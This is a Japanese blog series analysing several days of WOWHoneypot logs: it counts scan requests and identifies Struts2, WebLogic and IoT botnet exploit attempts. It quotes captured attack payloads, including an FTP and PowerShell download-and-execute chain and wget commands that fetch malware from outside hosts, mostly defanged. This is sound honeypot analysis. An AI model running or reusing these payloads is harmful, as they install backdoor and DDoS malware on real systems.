WOWHoneypotの簡易分析(5日目)
WOWhoneypotの2018/6/8(運用5日目)の簡易分析です。
本日のハニポへのアクセス件数は218件、内訳は以下です。
153 [2018-06-08 "POST /command.php
42 [2018-06-08 "GET /
12 [2018-06-08 "GET /index.action
2 [2018-06-08 "GET hxxp://httpheader[.]net/
2 [2018-06-08 "GET /HNAP1/
1 [2018-06-08 "GET /xxbb
1 [2018-06-08 "GET /stssys.htm
1 [2018-06-08 "GET /phpmyadmin
1 [2018-06-08 "GET hxxp://clientapi.ipip[.]net/echo.php?info=20180608125925
1 [2018-06-08 "GET hxxp://114.215.240[.]151:83/index.php
1 [2018-06-08 "GET hxxp://112.124.127[.]162:83/index.php
1 [2018-06-08 "GET /cgi/common.cgi
新しいのが多くて、ある意味豊作です。
/command.php がPOSTしている中身は例えば以下です。
cmd=cd /var/tmp && echo -ne \\x04\\x00\\x00\\x00\\x01 >> drop && echo OK
User-Agent: Wget(linux) で単一のIPから来ています。
これはReaper というIoTボットネット/マルウェアが対象としている D-Link DIR-600とDIR-300 への攻撃かと思われます。
Reaperボットネットに関する簡単なまとめ - 忙しい人のためのサイバーセキュリティニュース
/index.action は昨日同様、Sturts2の脆弱性を狙ったものでした。
/stssys.htmについては、以下の記事がありました。プリンタサーバを狙ったもののようです。
neonprimetime security , just trying to help: stssys.htm wget request
xxbbについては、User-Agent: Mozilla/5.0 zgrab/0.x でした。これはZMapベースのアプリケーションレイヤの脆弱性スキャナーのようです。
GitHub - zmap/zgrab: Application layer scanner that operates with ZMap
他のものはよくわかりませんでした。
幾つか来ているGET でhttpで他のIP/サイトから取得しようとしているもの(?)は不明です…。
ハンティングログは以下で前日と同じ内容で回数が増えただけでした。
[2018-06-08 22:18:27+0900] 42.6.2[.]126 wget -c http://119.188.247[.]73:5858/tatada
[2018-06-08 22:18:27+0900] 42.6.2[.]126 wget -c http://wap.tfddos[.]net:57843/linux
[2018-06-08 22:19:03+0900] 42.6.2[.]126 wget -c http://119.188.247[.]73:5858/tatada
[2018-06-08 22:19:03+0900] 42.6.2[.]126 wget -c http://wap.tfddos[.]net:57843/linux
[2018-06-08 22:19:26+0900] 42.6.2[.]126 wget -c http://119.188.247[.]73:5858/tatada
[2018-06-08 22:19:26+0900] 42.6.2[.]126 wget -c http://wap.tfddos[.]net:57843/linux
WOWHoneypot簡易分析(4日目)
WOWhoneypotの2018/6/7(運用4日目)の簡易分析です。
日付変わってから寝る前にさっと確認する感じで、やってみています。
本日のアクセス件数は143件でした。
42 [2018-06-07 "GET /
8 [2018-06-07 "GET /index.action
2 [2018-06-07 "GET /xampp/phpmyadmin/index.php
2 [2018-06-07 "GET /www/phpMyAdmin/index.php
2 [2018-06-07 "GET /web/phpMyAdmin/index.php
2 [2018-06-07 "GET /typo3/phpmyadmin/index.php
2 [2018-06-07 "GET /tools/phpMyAdmin/index.php
2 [2018-06-07 "GET /pmd/index.php
2 [2018-06-07 "GET /pma-old/index.php
2 [2018-06-07 "GET /pmamy/index.php
2 [2018-06-07 "GET /pmamy2/index.php
2 [2018-06-07 "GET /PMA/index.php
2 [2018-06-07 "GET /pma/index.php
2 [2018-06-07 "GET /PMA2/index.php
2 [2018-06-07 "GET /phpMyAdmin/phpMyAdmin/index.php
2 [2018-06-07 "GET /phpmyadmin/phpmyadmin/index.php
2 [2018-06-07 "GET /phpMyAdminold/index.php
2 [2018-06-07 "GET /phpMyAdmin.old/index.php
2 [2018-06-07 "GET /phpmyadmin-old/index.php
2 [2018-06-07 "GET /phpMyAdmin/index.php
2 [2018-06-07 "GET /phpmyadmin/index.php
2 [2018-06-07 "GET /phpMyadmin_bak/index.php
2 [2018-06-07 "GET /phpmyadmin2/index.php
2 [2018-06-07 "GET /phpmyadmin1/index.php
2 [2018-06-07 "GET /phpmyadmin0/index.php
2 [2018-06-07 "GET /phpma/index.php
2 [2018-06-07 "GET /phpadmin/index.php
2 [2018-06-07 "GET /mysql/index.php
2 [2018-06-07 "GET /mysqladmin/index.php
2 [2018-06-07 "GET /mysql-admin/index.php
2 [2018-06-07 "GET /myadmin/index.php
2 [2018-06-07 "GET /myadmin2/index.php
2 [2018-06-07 "GET /index.php
2 [2018-06-07 "GET /db/index.php
2 [2018-06-07 "GET /dbadmin/index.php
2 [2018-06-07 "GET /claroline/phpMyAdmin/index.php
2 [2018-06-07 "GET /admin/PMA/index.php
2 [2018-06-07 "GET /admin/pma/index.php
2 [2018-06-07 "GET /admin/phpMyAdmin/index.php
2 [2018-06-07 "GET /admin/phpmyadmin/index.php
2 [2018-06-07 "GET /admin/phpmyadmin2/index.php
2 [2018-06-07 "GET /admin/mysql/index.php
2 [2018-06-07 "GET /admin/mysql2/index.php
2 [2018-06-07 "GET /admin/index.php
1 [2018-06-07 "PROPFIND /
1 [2018-06-07 "POST /wls-wsat/CoordinatorPortType
1 [2018-06-07 "HEAD hxxp://(サーバIP):80/phpmyadmin/
1 [2018-06-07 "HEAD hxxp://180.163.113[.]82/check_proxy
1 [2018-06-07 "GET /pma/scripts/setup.php
1 [2018-06-07 "GET /phpMyAdmin/scripts/setup.php
1 [2018-06-07 "GET /myadmin/scripts/setup.php
1 [2018-06-07 "GET /manager/html
1 [2018-06-07 "GET /l.php
PhpMyAdmin関係が87件と大半を占めています。利用有無のスキャン行為と思われます。
/index.action のパスにアクセスしているApache Struts 2 の脆弱性 S2-045(CVE-2017-5638)を狙ったものは8件。これの取得するコードも昨日と同様です。
/wls-wsat/配下へのパスにアクセスしているWeblogicの脆弱性(CVE-2017-10271)を狙ったものも昨日と同様のIPへ取得しに行きます。
新しいものは、以下の2つ。
GET /l.php は詳細が不明です。
恐らくはWebShell等が埋め込まれているかの調査可と思います。
他の自動化された攻撃で既にやられていた場合に影響が出るパターンです。
hxxp://180.163.113[.]82/check_proxy は調べてみるとAbuseIPDBへ登録がありました。
180.163.113.82 | ChinaNet Shanghai Province Network | AbuseIPDB
他では、githubにこんなものも。これが当たりなかは不明です…。
また、本日のハンティングログはこちら。昨日と同じものが2件ずつ出ています。アクセス元IPは変わっています。
[2018-06-07 06:32:01+0900] 42.6.2[.]148 wget -c hxxp://119.188.247[.]73:5858/tatada
[2018-06-07 06:32:01+0900] 42.6.2[.]148 wget -c hxxp://wap.tfddos[.]net:57843/linux
[2018-06-07 06:32:14+0900] 42.6.2[.]148 wget -c hxxp://119.188.247[.]73:5858/tatada
[2018-06-07 06:32:14+0900] 42.6.2[.]148 wget -c hxxp://wap.tfddos[.]net:57843/linux
以上です。
WOWHoneypot簡易分析(3日目)
2018/6/6(運用3日目)の簡易分析です。
とりあえず、時間が取れて解析環境構築できるまでは、主にコマンドベースでの分析です。
6/6は計85件のアクセスです。今日はメソッドとパスで集計取りました。
$ awk '{print $1,$5,$6}' access_log | sort | uniq -c | grep "06-06" | sort -nr
33 [2018-06-06 "GET /
4 [2018-06-06 "GET /index.action
2 [2018-06-06 "GET /xampp/phpmyadmin/index.php
2 [2018-06-06 "GET /www/phpMyAdmin/index.php
2 [2018-06-06 "GET /typo3/phpmyadmin/index.php
2 [2018-06-06 "GET /pma-old/index.php
2 [2018-06-06 "GET /PMA/index.php
2 [2018-06-06 "GET /phpMyAdmin/phpMyAdmin/index.php
2 [2018-06-06 "GET /phpmyadmin/phpmyadmin/index.php
2 [2018-06-06 "GET /phpMyAdminold/index.php
2 [2018-06-06 "GET /phpMyAdmin.old/index.php
2 [2018-06-06 "GET /phpmyadmin-old/index.php
2 [2018-06-06 "GET /phpmyadmin1/index.php
2 [2018-06-06 "GET /phpmyadmin0/index.php
2 [2018-06-06 "GET /phpma/index.php
2 [2018-06-06 "GET /phpadmin/index.php
2 [2018-06-06 "GET /mysqladmin/index.php
2 [2018-06-06 "GET /mysql-admin/index.php
2 [2018-06-06 "GET /myadmin/index.php
2 [2018-06-06 "GET /index.php
2 [2018-06-06 "GET /claroline/phpMyAdmin/index.php
1 [2018-06-06 "PROPFIND /
1 [2018-06-06 "POST /wls-wsat/CoordinatorPortType
1 [2018-06-06 "HEAD /
1 [2018-06-06 "GET /winbox.png
1 [2018-06-06 "GET /pmd/index.php
1 [2018-06-06 "GET /pma/index.php
1 [2018-06-06 "GET /phpMyAdmin/index.php
1 [2018-06-06 "GET /mysql/index.php
1 [2018-06-06 "GET /foltia/
1 [2018-06-06 "GET /epgrec/do-record.sh
MySQLをウェブブラウザで管理するためのツールであるphpMyAdminの存在有無を調査すると思われるが計42件。
index.phpで終わるパスでphpMyaAdminやその略と思われるpma等が含まれるもの、/index.phpで終わっているものをカウントしています。
/index.action のパスにアクセスしている4件は、Apache Struts 2 の脆弱性 S2-045(CVE-2017-5638)を狙ったもの。
Content-Typeに攻撃コードが入るため分かりやすいです。以下が検知したものの任意のコード実行部分。ftpで1.exeを取得して実行するものです。
'echo open 107.179.45[.]135> c:\cmd.txt&echo 110>> c:\cmd.txt&echo 110>> c:\cmd.txt&echo get 1.exe>> c:\cmd.txt&echo bye >> c:\cmd.txt&echo 1.exe>> c:\cmd.txt&ftp -s:c:\cmd.txt&start 1.exe&1.exe&del c:\cmd.txt&exit'
VTやHAで見ても不明のため、そのうち調査したいと思います。
https://www.virustotal.com/#/url/7775d7b0e23b01783553290ab47158dade603bfbe6524b55b579ef1e978e7c07/detection
https://www.hybrid-analysis.com/sample/e682dfcdde010f6e15bae0d843696f6ae8d5a85e75441660b782789ee747f075?environmentId=120
/wls-wsat/配下へのアクセスはWeblogicの脆弱性(CVE-2017-10271)を狙ったもの。昨日と取得先IPだけが変わっています。この内容はハンティング機能で収集できるように設定を入れたいなと思います。
$OS=(GWmi Win32_OperatingSystem).Caption;$WC=New-Object Net.WebClient;$WC.Headers['User-Agent']="PowerShell/WL $OS";IEX $WC.DownloadString('hxxp://101.200.45[.]78/images/test/DL.php');
/foltia/のパスへのアクセスはfoltia ANIME LOCKERというLinux向けのアニメ録画用のOSSパッケージのようです。これを使っているかの調査のようです。
/epgrec/do-record.shも同じく録画予約システムのようです。LinuxベースでphpとMySQLを使っているようです。これの存在調査のようです。
こちらは以下のサイトで詳細に調査されていました。
6/6のハンティングログは以下です。
[2018-06-05 12:49:40+0900] 186.205.92[.]89 wget -O nmlt1.sh hxxp://domstates[.]su/nmlt1.sh
[2018-06-06 16:47:32+0900] 123.188.135[.]201 wget -c hxxp://119.188.247[.]73:5858/tatada
[2018-06-06 16:47:32+0900] 123.188.135[.]201 wget -c hxxp://wap.tfddos[.]net:57843/linux
一番上は前日のログにもあり、バックドアマルウェアのようです。
二つ目はLinux向けのDDoS用マルウェアのようです。
https://www.virustotal.com/#/url/c5fd7464cc3a44e57daeaf5ee58d0dff3206802b947b99dcf97b7d5461b53eee/detection
3つ目は不明でした。これも調べてみたいところです。
https://www.virustotal.com/#/url/fac9df70f02c64af7e320e1388418c6bcaa36473c18cbfea6803ba0e620d7b25/detection
以上です。
